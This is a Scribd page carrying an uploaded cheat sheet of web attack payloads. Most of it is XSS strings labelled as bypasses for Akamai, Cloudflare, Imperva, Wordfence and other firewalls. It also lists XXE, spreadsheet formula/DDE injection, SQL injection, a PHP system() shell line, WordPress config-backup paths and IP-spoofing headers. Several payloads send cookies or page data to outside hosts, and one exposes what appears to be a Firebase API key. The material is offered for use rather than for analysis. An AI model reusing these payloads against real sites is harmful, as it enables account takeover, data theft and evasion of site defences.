Scribd
Upload
165 views23 pages

XSS Payloads for Security Experts

Uploaded by

marvelironman3000
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
165 views23 pages

XSS Payloads for Security Experts

Uploaded by

marvelironman3000
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

EICARdropper

[Link]

[Link]

.*\.doit\.com$

[Link]
2X5whfaVv8a5ozTEMP_k&target=language

[Link]
ovNX0mzDrDlOoLEKWCH2EWOSQohg

--------------------------------------------------------------------------------------------------------------
----------------------------

Most IMP XSS Payloads for Waf Bypass

--------------------------------------------------------------------------------------------------------------
----------------------------

Test<a href=javascript:alert(1)>click<a %00


src=\"&Tab;javascript:prompt([Link])&Tab;\"%00onclick=alert(1)> fooo

[Link] payloads, by @shrekysec

/(A('onerror=%22alert%601%60%22testabcd))/

/Orders/(A(%22onerror='alert%60xss%60'testabcd))/[Link]?ReturnUrl=/Orders

(A(%22onerror='alert%601%60'testabcd))/[Link]?ReturnUrl=%2f

"></SCRIPT>--
!><SCRIPT>alert([Link](88,83,83))</SCRIPT>%27}};">});});})]--

Bypass Filter JavaScript source code

--></SCRIPT>">'><SCRIPT>alert([Link](100, 111, 99, 117, 109, 101, 110,


116, 46, 99, 111, 111, 107, 105, 101))</SCRIPT>
JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--
></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoF
ocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//[Link]\76-->

JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*<!--
></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoF
ocus/OnFocus=/*${/*/;{/**/(alert)(1)}//><Base/Href=//[Link]\76-->

<button onClick={() => [Link]("javascript:(alert)(3)")}>Click</button>

i2lte%22%3e%3cscript%3ealert(1)%3c%2fscript%3eayawz

<A/HRef=javascript:top/**/?.['ale'%2B'rt'](1)>

<</div>script</div>>confirm()<</div>/script</div>>

<svg/onload=window["al"+"ert"]`1337`>

<img src="[Link]" usermap="#themap" width="99" height="99"><map


name="themap"><area coords="0,0,99,99" href="javascript:alert(1337)"></map>

<iframe src="javascript:setTimeout(function() {
/*\*/top['al'+'\u0065'+'rt']([Link])/*\*/ }, 5000);"></inpuT%3E;>

<inpuT autofocus oNFocus="setTimeout(function() {


/*\*/top['al'+'\u0065'+'rt']([Link])/*\*/ }, 5000);"></inpuT%3E;>

1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>


<!--
><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource]([Link]
kie)%27>

<div
onpointerover="ja&#x76;ascr&#x69;pt:eva&#x6C;(decodeURICompo&#110;ent(String.f
romCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100,
111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div>

<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26
%2300000000000000000041//

<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return
this')()[['al\u0065'+'rt'][0]]([[Link](8238)+[!+[]+!+[]]+[![]+[]][+[]]])">

<video><source onerror="[Link]('return this')().alert('0f')">

<EMBED SRC="data:image/svg+xml;base64,PHN2Zy9vbmxvYWQ9d2luZG93WyJhbCIrI
mVydCJdYDEzMzdgPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBE
D>

<svg/onload=window[“al”+”ert”]`1337`>

<option><style></option></select><img src=x onerror=alert(1)></style>

<Svg Only=1 OnLoad=confirm(1)>

<input/onclick=alert(1)>

{{[Link]('alert([Link])')()}}
<image src/onerror=alert("Contact_Name")>

javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click


me</button><hvita onbeforetoggle=+a+b+c+ popover id=x>Hvita</hvita>")

<a href=\"javascript:alert([Link])\" onClick=\"var a =\"}, var a=5;


prompt(7);function a(){var b={c: {d:{//\"\">Click Me</a>

<A href=javascript:alert(1)>asd

<script>alert()<\/script>

"/><img src=u onerror="alert([Link])"<

<details ontoggle=alert(1)>

<a href="data:text/html,<script>alert(1)</script>">Click Here</a>

<a target="_blank" href="[Link]


onhower=alert(2)>Safe</a>

<p><a href="[Link]

<a target="_blank"
href="data:text/URI,javascript:alert([Link]);">test</a>

<svg/onload=alert(/1/)>
<svg/on<script>load=prompt([Link]);>”/>

<script>x=new
XMLHttpRequest;[Link]=function(){[Link]([Link])};[Link](‘GET’,’
file:///etc/hosts’);[Link]();</script>

<noscript>&amp;lt;p title=” &lt;/noscript&gt;&lt;style onload=


alert([Link])//&quot;&gt; *{/*all*/color/*all*/:/*all*/#f78fb3/*all*/;}
&lt;/style&gt;

<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;onclick=alert(1)">Click
me</a>

<script>[Link](0,0,’/i/am/somewhere_else’);</script><iframe
onload=”javascript:alert([Link])”>

<body onload="javascript:[Link]('\x2fportal\x2fc');">

--------------------------------------------------------------------------------------------------------------
----------------------------

AKamai Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<style>@keyframes
a{}b{animation:a;}</style><b/onanimationstart=prompt`${[Link]}&#x60;>

<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>

<svg><circle><set onbegin=prompt(1) attributename=fill>

<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a() x>

"%3balert`1`%3b"
asd"`> onpointerenter=x=prompt,x`XSS`

<x onauxclick=import('//1152848220/')>click

<x onauxclick=a=alert,a(domain)>click

<x onauxclick=import('//1152848220/')>click

<x onauxclick=import('//xss/')>click

\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss

{{[Link](alert`1`)()}}

javascript:new%20Function`al\ert\`1\``;

[Link]

[Link]

<script>[Link] = 1;[Link]='[Link]
[Link]/xss/[Link]'</script> -[Link]
scripting/cheat-sheet

"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;[Link]("//hacke
[Link]/stealthy?x="+location)'>Click

--------------------------------------------------------------------------------------------------------------
----------------------------

Cloudflare Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<a"/onclick=(confirm)()>Click Here!

Dec: <svg onload=prompt%26%[Link])>

Hex: <svg onload=prompt%26%23x000000028;[Link])>

xss'"><iframe srcdoc='%26lt;script>;prompt`${[Link]}`%26lt;/script>'>
<a
href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;&lpar;a&Tab;l&Tab;e&Tab;r&Ta
b;t&Tab;([Link])&rpar;">X</a>

<--%253cimg%20onerror=alert(1)%20src=a%253e --!>

<a+HREF='%26%237javascrip%26%239t:alert%26lpar;[Link])'>

javascript:{ alert`0` }

1'"><img/src/onerror=.1|alert``>

<img src=x onError=import('//1152848220/')>

%2sscript%2ualert()%2s/script%2u

<svg on onload=(alert)([Link])>

<img ignored=() src=x onerror=prompt(1)>

<svg onx=() onload=(confirm)(1)>

“><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;docume
[Link]%26%2300000000000000000041;

<svg on =i onload=alert(domain)

<svg/onload=location/**/='[Link]

<svg onx=() onload=[Link]?.()>

test",prompt%0A/*HelloWorld*/([Link])

"onx+%00+onpointerenter%3dalert(domain)+x"

"><svg%20onload=alert%26%230000000040"1")>

%27%09);%0d%0a%09%09[1].find(alert)//

"><img src=1 onmouseleave=print()>

<svg on onload=(alert)([Link])>

<svg/on%20onload=alert(1)> (working)

<img/src=x onError="`${x}`;alert(`[Link]`);">
--------------------------------------------------------------------------------------------------------------
----------------------------

Cloudfront Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x


onerror=javascript:alert(`cloudfrontbypass`)//'>

">'><details/open/ontoggle=confirm('XSS')>

6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/

&quot;&gt;&lt;img src=x onerror=confirm(1);&gt;

--------------------------------------------------------------------------------------------------------------
----------------------------

Imperva Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<x/onclick=globalThis&lsqb;'\u0070r\u006f'+'mpt']&lt;)>clickme

tarun"><x/onafterscriptexecute=confirm%26lpar;)//

<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+
v+h+n)(/infected/.source)" />click

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%
2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

<svg onload\r\n=$.globalEval("al"+"ert()");>

<bleh/onclick=top[/al/.source+/ert/.source]&Tab;``>click

<sVg OnPointerEnter="location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//</div">
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='test'}[self][0][v+a+e+s](e+s+v
+h+n)(/infected/.source)" />tap

--------------------------------------------------------------------------------------------------------------
----------------------------

Incapsula Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

<iframe/onload='this["src"]="javas&Tab;cript:al"+"ert``"';>

<iframe/onload="var b = '[Link])'; var a = 'JaV' + 'ascRipt:al' + 'ert(' + b;


this['src']=a">

<audio autoplay onloadstart=[Link]='hxxps://[Link]/?c='+document["cook"+"ie"]'


src=x>

<img/src=q onerror='new Function`al\ert\`1\``'>

<object
data='data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=='></obje
ct>

<svg onload\r\n=$.globalEval("al"+"ert()");>

[1].map(alert) or (alert)(1)

<"><details/open/ontoggle="jAvAsCrIpT&colon;alert&lpar;/xss-by-
tarun/&rpar;">XXXXX</a>

[1].find(confirm)

<svg/onload=self[`aler`%2b`t`]`1`>

%22%3E%3Cobject%20data=data:text/html;;;;;base64,PHNjcmlwdD5hbGVydCgxKTwv
c2NyaXB0Pg==%3E%3C/object%3E

'-[[Link]].map(alert)-'
--------------------------------------------------------------------------------------------------------------
----------------------------

Wordfence Bypass XSS Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

ax6zt%2522%253e%253cscript%253ealert%[Link]%2529%253c%25
2fscript%253ey6uu6

<meter onmouseover="alert(1)" -@manjith27945363

'">><div><meter onmouseover="alert(1)"</div>"

>><marquee loop=1 width=0 onfinish=alert(1)>

Wordfence 7.4.2

<a href=&#01javascript:alert(1)>

<a/href=%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;
%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x0a;:alert(1)>please%20cl
ick%20here</a>

--------------------------------------------------------------------------------------------------------------
----------------------------

For Slack

--------------------------------------------------------------------------------------------------------------
----------------------------

'"<b oncut=alert(3)>asd</b>>

slack '"><sript>var a= 4;</script> test '"><script>var a =1; </script>

'"><img src=u onerror=alert(21)>

<script>alert(1)</script>

'"><b>ssss<a href="[Link]">ssss</a><img/src='u'/onerror=alert(7777)>
'"><b>ss<a href="[Link]">ssss</a><img/src='u'/onerror=alert()>

"'><img src=u onerror=alert(1)>

<a href="[Link]

[click here]([Link]

--------------------------------------------------------------------------------------------------------------
----------------------------

Random Payloads

--------------------------------------------------------------------------------------------------------------
----------------------------

test1 <a href="data:text/html,<script>alert(1)</script>">Click Here</a>

';alert([Link](88,83,83))//';alert([Link](88,83,83))//";alert(
[Link](88,83,83))//";alert([Link](88,83,83))//--
></SCRIPT>">'><SCRIPT>alert([Link](88,83,83))</SCRIPT>

'';!--"<XSS>=&{()}

0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"

<script/src=data:,alert()>

<marquee/onstart=alert()>

<video/poster/onerror=alert()>

<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=[Link]

<IMG SRC="javascript:alert('XSS');">

<IMG SRC=javascript:alert('XSS')>

<IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<a onmouseover="alert([Link])">xxs link</a>

<a onmouseover=alert([Link])>xxs link</a>


<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

<IMG SRC=javascript:alert([Link](88,83,83))>

<IMG SRC=# onmouseover="alert('xxs')">

<IMG SRC= onmouseover="alert('xxs')">

<IMG onmouseover="alert('xxs')">

<IMG SRC=/ onerror="alert([Link](88,83,83))"></img>

<IMG
SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&
#108;&#101;&#114;&#116;&#40;

&#39;&#88;&#83;&#83;&#39;&#41;>

<IMG
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&
#0000105&#0000112&#0000116&#0000058&#0000097&

#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000
083&#0000083&#0000039&#0000041>

<IMG
SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6
C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

<IMG SRC="jav ascript:alert('XSS');">

<IMG SRC="jav&#x09;ascript:alert('XSS');">

<IMG SRC="jav&#x0A;ascript:alert('XSS');">

<IMG SRC="jav&#x0D;ascript:alert('XSS');">

<IMG SRC=" &#14; javascript:alert('XSS');">

<SCRIPT/XSS SRC="[Link]

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

<SCRIPT/SRC="[Link]

<<SCRIPT>alert("XSS");//<</SCRIPT>

<SCRIPT SRC=[Link] B >

<SCRIPT SRC=//[Link]/.j>

<IMG SRC="javascript:alert('XSS')"
<iframe src=[Link] <

\";alert('XSS');//

</script><script>alert('XSS');</script>

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<IMG LOWSRC="javascript:alert('XSS')">

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>

<IMG SRC='vbscript:msgbox("XSS")'>

<IMG SRC="livescript:[code]">

<BODY ONLOAD=alert('XSS')>

<BGSOUND SRC="javascript:alert('XSS');">

<BR SIZE="&{alert('XSS')}">

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

<LINK REL="stylesheet" HREF="[Link]

<STYLE>@import'[Link]

<META HTTP-EQUIV="Link" Content="<[Link] REL=stylesheet">

<STYLE>BODY{-moz-binding:url("[Link]

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

exp/*<A STYLE='no\xss:noxss("*//*");

xss:ex/*XSS*//*/*/pression(alert("XSS"))'>

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A
CLASS=XSS></A>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url([Link]);">

¼script¾alert(¢XSS¢)¼/script¾

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html


base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

<META HTTP-EQUIV="refresh" CONTENT="0; URL=[Link]

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

<IFRAME SRC=# onmouseover="alert([Link])"></IFRAME>

<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

<TABLE BACKGROUND="javascript:alert('XSS')">

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

<DIV STYLE="background-
image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\007
4\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

<DIV STYLE="width: expression(alert('XSS'));">

<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->

<BASE HREF="javascript:alert('XSS');//">

<OBJECT TYPE="text/x-scriptlet" DATA="[Link]

<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT


SRC=[Link]

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>

<IMG
SRC="[Link]
scode">

<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">

<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">


</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-

<SCRIPT a=">" SRC="[Link]


<SCRIPT =">" SRC="[Link]

<SCRIPT a=">" '' SRC="[Link]

<SCRIPT "a='>'" SRC="[Link]

<SCRIPT a=`>` SRC="[Link]

<SCRIPT a=">'>" SRC="[Link]

<SCRIPT>[Link]("<SCRI");</SCRIPT>PT
SRC="[Link]

<A HREF="[Link]

0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"

veris-->group<svg/onload=alert(/XSS/)//

#"><img src=M onerror=alert('XSS');>

element[attribute='<img src=x onerror=alert('XSS');>

[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]

%22;alert%28%27RVRSH3LL_XSS%29//

javascript:alert%281%29;

<w contenteditable id=x onfocus=alert()>

alert;pg("XSS")

<svg/onload=%26%23097lert%26lpar;1337)>

<script>for((i)in(self))eval(i)(1)</script>

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>

<sCR<script>iPt>alert(1)</SCr</script>IPt>

<a
href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">
test</a>

Vue JS
{{$[Link]`fetch(%27[Link]
m%27,%20{%20method:%20%27POST%27,%20mode:%20%27no-
cors%27,%20body:%[Link]%20});`()}}

{{$[Link]`function b(){eval([Link])};a=new
XMLHttpRequest();[Link]("load", b);[Link]("GET",
"//[Link]/s/sid0krypt");[Link]()`()}}

{{_Vue.[Link]('x','[Link]("HI this is sid0krypt")')(this)}}

{{_Vue.[Link]('x','[Link](x)')(this)}}

{{_Vue.[Link]`alert(1)`()}}

{{$[Link]`alert(1)`()}}

${\"zjz\".toString().replace(\"j\", \"o\")}

${'a'.getClass().forName('[Link]').newInstance().getEngineB
yName('JavaScript').eval(\"var x=new [Link];
[Link](\\\"ping\\\",\\\"[Link]\\\
"); [Link]([Link]().getInputStream())\")}

XML External Entity (XXE) Injection

<?xml version="1.0" standalone="yes"?><!DOCTYPE test [ <!ENTITY xxe SYSTEM

"[Link] > ]><test>&xxe</test><svg


xmlns="[Link] font-size="16" x="10"

y="40">%26xxe1;</text></svg>, <?xml version="1.0" standalone="yes"?><!DOCTYPE


test [ <!ENTITY
xxe1 SYSTEM "[Link] > ]><svg

xmlns="[Link] font-size="16" x="10"


y="40">%26xxe1;</text></svg>

*********HTML Injection*********

<a href=[Link]

<a href=[Link]

<a href=[Link] here</a>

*********Formula Injection*********

=calc|A0!Z

@calc|A0!Z

=cmd|' /C calc'!xxx

=cmd|'/[Link]'!z

=cmd|' /C notepad'!'A1'

DDE ("cmd";"/C calc";"!A0")A0

%0A-3+3+cmd|' /C calc'!D2

*********Command Execution*********

=WEBSERVICE("[Link]

=WEBSERVICE("[Link]

=INFO("/etc/passwd"),

=INFO("SYSTEM"),

=INFO("OSVERSION")

*********CSRF*********
[Link] ----
JSON Padding

[Link] -------------------------------------JSON
Padding

JSON change into x-www-form-urlencoded

replace ":" with = and "," with &

[Link] Padding oracle

[Link] url ma check karvu

web cache poissioning

coockie language:en

coockie language:pl 400 or 403

X-Forwared-Host:Blueinfy

pachi ni main request ma same j respons aave

try in GET Method

[Link]

<?xml version="1.0"?>

<methodCall>

<methodName>[Link]</methodName>

<params>

</params>

</methodCall>

[Link]

<?xml version="1.0"?>
<methodCall>

<methodName>[Link]</methodName>

<params><params>

<value><string>[Link]

</param><param><value><string>[Link]

</value></param></params>

</methodCall>

curl [Link]

--------------------------------------------------------------------------------------------------------------
----------------------------

Wordpress

--------------------------------------------------------------------------------------------------------------
----------------------------

/.htaccess

/wp-includes/

/wp-json/

/wp-content/uploads/

/wp-json/wp/v2/users

/wp-admin

/wp-admin/[Link]

/wp-json/?rest_route=/wp/v2/users/

/wp-confi[Link]-backup /wp-confi[Link]

/.wp-confi[Link]

/wp-confi[Link] /wp-confi[Link]

/wp-confi[Link]
/wp-confi[Link]

/wp-confi[Link]

/wp-confi[Link]

/wp-confi[Link]

/wp-confi[Link]

/wp-confi[Link]

/wp-confi[Link]

/wp-confi[Link]

/wp-confi[Link] /wp-confi[Link]

/wp-confi[Link]~

/wp-confi[Link]

/_wpeprivate/confi[Link]

Wordpress Elementor Website Builder plugin <= 3.5.5 versions

#elementor-
action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidml
kZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZ
W50LmRvbWFpbikifX0=

[Link] ------CVSS Score

{{5*5}}

{{7,*7}} ------Templet injection

[Link]

x-forwarded-scheme: http

X-forwarded-host: host
X-Real-IP: [Link]

X-Client-IP: [Link]

X-Rewrite-URL: [Link]

X-Remote-IP: [Link]

X-Remote-Addr: [Link]

X-ProxyUser-Ip: [Link]

X-Originating-IP: [Link]

X-Original-URL: [Link]

X-Forwarded: [Link]

X-Forwarded-For: [Link]

X-Custom-IP-Authorization: [Link]

True-Client-IP: [Link]

Intercom ChatBot Security Misconfiguration:

Intercom('boot', { email: 'xyz@[Link]' });

HelpCrunch ChatBot Security Misconfiguration

HelpCrunch('userAuth', {user_id: 'xyz@[Link]'});

Botframework (microsoft Azure)

[Link]({userEmail:'xyz@[Link]'});

[Link]
.com

[Link]
' waitfor delay'[Link]'--

Error Base

union Base

Blind - Time and Boolean

Second order SQL Injection

Update user password='123' where username = 'xyz' and password = '123'

Update user password='123' where username ='xyz'-- and

Broken Access Control

Cryptographic Failuare

Injection

Insecure Designed

Security Misconfiguration

Vulnerable and outdated Componants

Authentication or identification Failure

Software Data and integrity Failuare

Security logging and Monitoring Failuare

SSFR

<?php system(id); ?>

Firebase:

[Link]
cbddbd0e71e3
[Link]
database

__/firebase/[Link]

GET /v1alpha/projects/-
/apps/1:361636954636:web:220eedf13a3a1aa0d36429/webConfig HTTP/2

Host: fi[Link]

X-Goog-Api-Key: AIzaSyB8KMna82QZS8RR9mIjO-xOzq19E4Vx-gg

If Find SSRF go for the [Link]

Hint: `whoami`.<burp>

You might also like